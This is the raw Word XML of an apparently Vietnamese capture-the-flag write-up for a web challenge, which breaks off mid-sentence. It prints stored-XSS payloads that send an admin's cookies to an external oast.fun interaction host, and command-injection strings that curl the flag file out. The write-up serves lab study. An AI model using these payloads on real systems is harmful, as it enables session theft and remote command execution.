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BC92" w14:textId="460AADC6" w:rsidR="002F49FE" w:rsidRPr="000F571C" w:rsidRDefault="000F571C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F571C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Phân tích code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B95328" w14:textId="3AB7F149" w:rsidR="000F571C" w:rsidRDefault="000F571C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="256FBC3D" w14:textId="55413D6C" w:rsidR="008C5FB5" w:rsidRDefault="008C5F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Trang chủ: trả về Hello, World!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5787AA3F" w14:textId="42DE2F27" w:rsidR="008C5FB5" w:rsidRDefault="008C5FB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E5560EF" wp14:editId="6087CFF1">
            <wp:extent cx="3060700" cy="77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B99E" w14:textId="462C133E" w:rsidR="008C5FB5" w:rsidRDefault="008C5FB5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37212C4B" w14:textId="5EE3B6D3" w:rsidR="00EC0AC3" w:rsidRDefault="00EC0A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Tạo stats:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF8F93B" w14:textId="5BC312DC" w:rsidR="00EC0AC3" w:rsidRDefault="00EC0AC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C66CD6" wp14:editId="77A5FCD5">
            <wp:extent cx="4574472" cy="325901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34" cy="32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6546" w14:textId="47B52916" w:rsidR="00860B53" w:rsidRDefault="00860B53">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38D691EC" w14:textId="4D8103FD" w:rsidR="009713FD" w:rsidRDefault="009713F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736D793" wp14:editId="460680B2">
            <wp:extent cx="5861538" cy="34167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739" cy="341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DE7E" w14:textId="1AF0C841" w:rsidR="009713FD" w:rsidRDefault="009713FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="223F1472" w14:textId="4638EA5F" w:rsidR="00860B53" w:rsidRDefault="00860B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Đọc stats: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10841043" w14:textId="1E5D8A53" w:rsidR="00860B53" w:rsidRDefault="00860B5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5905E6F" wp14:editId="4700CB25">
            <wp:extent cx="5298831" cy="162383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450" cy="162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8A14" w14:textId="77777777" w:rsidR="009713FD" w:rsidRDefault="009713FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D472236" w14:textId="7BF95EE2" w:rsidR="009713FD" w:rsidRDefault="00860B5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D6A9F87" wp14:editId="5124B8F2">
            <wp:extent cx="5826369" cy="2767525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41" cy="276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F6AB" w14:textId="0138CDA0" w:rsidR="00860B53" w:rsidRDefault="00860B53">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="105BD0AE" w14:textId="77777777" w:rsidR="00860B53" w:rsidRPr="00860B53" w:rsidRDefault="00860B53" w:rsidP="00860B53">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00860B53">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D616B4C" w14:textId="77777777" w:rsidR="00860B53" w:rsidRPr="009E088E" w:rsidRDefault="00860B53" w:rsidP="00860B53">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E088E">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5E030D" w14:textId="77777777" w:rsidR="00860B53" w:rsidRPr="009E088E" w:rsidRDefault="00860B53" w:rsidP="00860B53">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E088E">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>"username":"&lt;script&gt;alert(1)&lt;/script&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA7C54A" w14:textId="77777777" w:rsidR="00860B53" w:rsidRPr="009E088E" w:rsidRDefault="00860B53" w:rsidP="00860B53">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E088E">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>"high_score":"1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4148913B" w14:textId="77777777" w:rsidR="00860B53" w:rsidRPr="009E088E" w:rsidRDefault="00860B53" w:rsidP="00860B53">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E088E">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B351BE2" w14:textId="6E0B8E4A" w:rsidR="00860B53" w:rsidRDefault="00860B53" w:rsidP="00860B53">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00860B5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Thực thi Javascript thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5E91BC" w14:textId="6309C604" w:rsidR="00860B53" w:rsidRDefault="00860B53" w:rsidP="00860B53">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08FE76CD" w14:textId="42D5BD43" w:rsidR="00860B53" w:rsidRDefault="00861658" w:rsidP="00860B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Nếu bạn gửi bài post cho admin thì có thể khai thác lỗ hổng XSS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCA9EB8" w14:textId="2437A820" w:rsidR="00861658" w:rsidRDefault="00861658" w:rsidP="00860B53">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06399EB5" w14:textId="7A8F6E17" w:rsidR="00861658" w:rsidRDefault="00861658" w:rsidP="00860B5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355739A" wp14:editId="2CE4DBFC">
            <wp:extent cx="4935415" cy="4481710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792" cy="449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5620" w14:textId="7ACDF9C3" w:rsidR="00861658" w:rsidRDefault="00861658" w:rsidP="00860B53">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F8EC9B1" w14:textId="7D0AF40F" w:rsidR="008606A2" w:rsidRDefault="008606A2" w:rsidP="00860B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Để lấy được flag, bạn phải thực thi lệnh từ xa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8A697D" w14:textId="2841E84D" w:rsidR="008606A2" w:rsidRDefault="008606A2" w:rsidP="00860B5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F8A001" wp14:editId="5D8CF0FA">
            <wp:extent cx="5392615" cy="269630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96" cy="27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8767" w14:textId="3771662E" w:rsidR="008606A2" w:rsidRDefault="008606A2" w:rsidP="00860B53">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1469C00A" w14:textId="68D675EA" w:rsidR="008606A2" w:rsidRDefault="008606A2" w:rsidP="00860B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Cách 1: Khai thác lỗ hổng XSS để lấy cookie của admin, tự chạy /api/cal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439CBA0F" w14:textId="77777777" w:rsidR="009E088E" w:rsidRDefault="009E088E" w:rsidP="00860B53">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06768BC5" w14:textId="40EC4841" w:rsidR="008606A2" w:rsidRDefault="009E088E" w:rsidP="00860B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Payload: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F2649B" w14:textId="77777777" w:rsidR="009E088E" w:rsidRPr="009E088E" w:rsidRDefault="009E088E" w:rsidP="009E088E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E088E">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750A6D64" w14:textId="77777777" w:rsidR="009E088E" w:rsidRPr="009E088E" w:rsidRDefault="009E088E" w:rsidP="009E088E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E088E">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>"username":"&lt;script&gt;fetch('http://gqapsnoypgrztlcpwfuak4jdcxpogewb7.oast.fun/', { method: 'POST', mode: 'no-cors', body: document.cookie});&lt;/script&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C13826D" w14:textId="77777777" w:rsidR="009E088E" w:rsidRPr="009E088E" w:rsidRDefault="009E088E" w:rsidP="009E088E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E088E">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>"high_score":"1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEE0085" w14:textId="6E9AA01F" w:rsidR="009E088E" w:rsidRDefault="009E088E" w:rsidP="009E088E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E088E">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFDBAD3" w14:textId="6E2E5B82" w:rsidR="009E088E" w:rsidRDefault="006D6E69" w:rsidP="009E088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Mình nhận được kết nối trên interact.sh nhưng không nhận được cookie </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03798171" w14:textId="67677F3A" w:rsidR="006D6E69" w:rsidRDefault="006D6E69" w:rsidP="009E088E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0888B03C" w14:textId="33DC9A24" w:rsidR="006D6E69" w:rsidRDefault="006D6E69" w:rsidP="009E088E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55C2BF6" wp14:editId="0A9A5323">
            <wp:extent cx="2086708" cy="14641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637" cy="146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18F1" w14:textId="53AF9579" w:rsidR="006D6E69" w:rsidRDefault="006D6E69" w:rsidP="009E088E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12063081" w14:textId="1DDD22B4" w:rsidR="006D6E69" w:rsidRDefault="006D6E69" w:rsidP="009E088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Nếu httpOnly=true, bạn rất khó lấy được cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478916AD" w14:textId="1D9AFFE5" w:rsidR="006D6E69" w:rsidRDefault="006D6E69" w:rsidP="009E088E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D6E69">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cách 1 failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E57B6CD" w14:textId="77777777" w:rsidR="006D6E69" w:rsidRPr="009E088E" w:rsidRDefault="006D6E69" w:rsidP="009E088E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3BB7FE" w14:textId="534ECCDF" w:rsidR="00755290" w:rsidRDefault="008606A2" w:rsidP="00860B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Cách 2: </w:t>
      </w:r>
      <w:r w:rsidR="006D6E69">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Tạo 1 stat cho admin chuyển tiếp đến </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/api/cal, trả kết quả cho chúng ta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11166041" w14:textId="660F9052" w:rsidR="00755290" w:rsidRDefault="00755290" w:rsidP="00860B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Payload: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D3AA9A" w14:textId="77777777" w:rsidR="00755290" w:rsidRPr="008D0D80" w:rsidRDefault="00755290" w:rsidP="00755290">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0D80">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7744D4A5" w14:textId="77777777" w:rsidR="00755290" w:rsidRPr="008D0D80" w:rsidRDefault="00755290" w:rsidP="00755290">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0D80">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>"username":"&lt;script&gt;(async () =&gt; {{let response = await fetch('/api/cal?modifier=;cat /ctf/flag.txt');let flag = await response.text();await fetch('http://gqapsnoypgrztlcpwfuak4jdcxpogewb7.oast.fun/?c=' + btoa(flag))}})()&lt;/script&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269EC424" w14:textId="77777777" w:rsidR="00755290" w:rsidRPr="008D0D80" w:rsidRDefault="00755290" w:rsidP="00755290">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0D80">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>"high_score":"1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8EB1A6" w14:textId="087BAE0A" w:rsidR="008D0D80" w:rsidRPr="00023FB6" w:rsidRDefault="00755290" w:rsidP="00755290">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0D80">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7C86A2" w14:textId="77777777" w:rsidR="008D0D80" w:rsidRDefault="008D0D80" w:rsidP="00755290">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7823EED6" w14:textId="77777777" w:rsidR="006D6E69" w:rsidRDefault="006D6E69" w:rsidP="00860B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Cách 3: cho admin chạy trực tiếp </w:t>
      </w:r>
      <w:r w:rsidRPr="006D6E69">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/api/cal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, trả kết quả cho chúng ta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A962639" w14:textId="3D4500B8" w:rsidR="006D6E69" w:rsidRDefault="006D6E69" w:rsidP="00860B53">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B396C89" w14:textId="363F41F5" w:rsidR="006D6E69" w:rsidRDefault="006D6E69" w:rsidP="00860B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Cách này bị lọc: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F8122B4" wp14:editId="724BC2E1">
            <wp:extent cx="50419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2873" w14:textId="20669274" w:rsidR="00C75C8C" w:rsidRDefault="00C75C8C" w:rsidP="00860B53">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A0D3B58" w14:textId="231ADE79" w:rsidR="00C75C8C" w:rsidRPr="00821A9B" w:rsidRDefault="00C75C8C" w:rsidP="00860B53">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99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Payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="00821A9B">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>api/ca\tl?modifier=5;curl</w:t>
      </w:r>
      <w:r w:rsidR="00D91DF4" w:rsidRPr="00821A9B">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00821A9B">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://gqapsnoypgrztlcpwfuak4jdcxpogewb7.oast.fun</w:t>
      </w:r>
      <w:r w:rsidR="00D91DF4" w:rsidRPr="00821A9B">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D57A62" w14:textId="10C4E4CF" w:rsidR="00557D4F" w:rsidRDefault="00557D4F" w:rsidP="00860B53">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C8A9F8E" w14:textId="02400D5F" w:rsidR="00557D4F" w:rsidRDefault="00557D4F" w:rsidP="00860B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Nếu bạn đưa trực tiếp payload này cho admin thì không chạy được đâu vì trình duyệt không hiểu \t là gì. Phải chỉnh sửa là %09 trong burpsuite nha. Sửa ở trình duyệt cũng không được vì nó chặn %. Chỗ này mình không hiểu lắm, nếu để % trong burpsuite thì không bị chặn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4D9E6C" w14:textId="32C375D2" w:rsidR="00557D4F" w:rsidRDefault="00557D4F" w:rsidP="00860B53">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F8BC8F1" w14:textId="0305A155" w:rsidR="00557D4F" w:rsidRPr="00666457" w:rsidRDefault="00821A9B" w:rsidP="00860B53">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99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Payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="00666457">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>path=api%2Fca%09l%3Fmodifier%3D-1%3Bcurl+http%3A%2F%2Fgqapsnoypgrztlcpwfuak4jdcxpogewb7.oast.fun%2F+-d+%22%24%28cat+flag%2A%29%22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CCE786" w14:textId="74DAF816" w:rsidR="00821A9B" w:rsidRDefault="00821A9B" w:rsidP="00860B53">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F6C603A" w14:textId="75CAB5BE" w:rsidR="00821A9B" w:rsidRDefault="00821A9B" w:rsidP="00860B53">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666457">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>api/ca</w:t>
      </w:r>
      <w:r w:rsidRPr="00666457">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00AA4954">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00666457">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>l?modifier=-1;curl http://gqapsnoypgrztlcpwfuak4jdcxpogewb7.oast.fun/ -d "$(cat flag*)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B339F0" w14:textId="6DC28F8A" w:rsidR="0044448D" w:rsidRDefault="0044448D" w:rsidP="00860B53">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C099BCA" w14:textId="73B1879A" w:rsidR="0044448D" w:rsidRPr="0044448D" w:rsidRDefault="0044448D" w:rsidP="00860B53">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0044448D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Nếu bạn muốn gửi đến </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>webhook</w:t>
      </w:r>
      <w:r w:rsidRPr="0044448D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
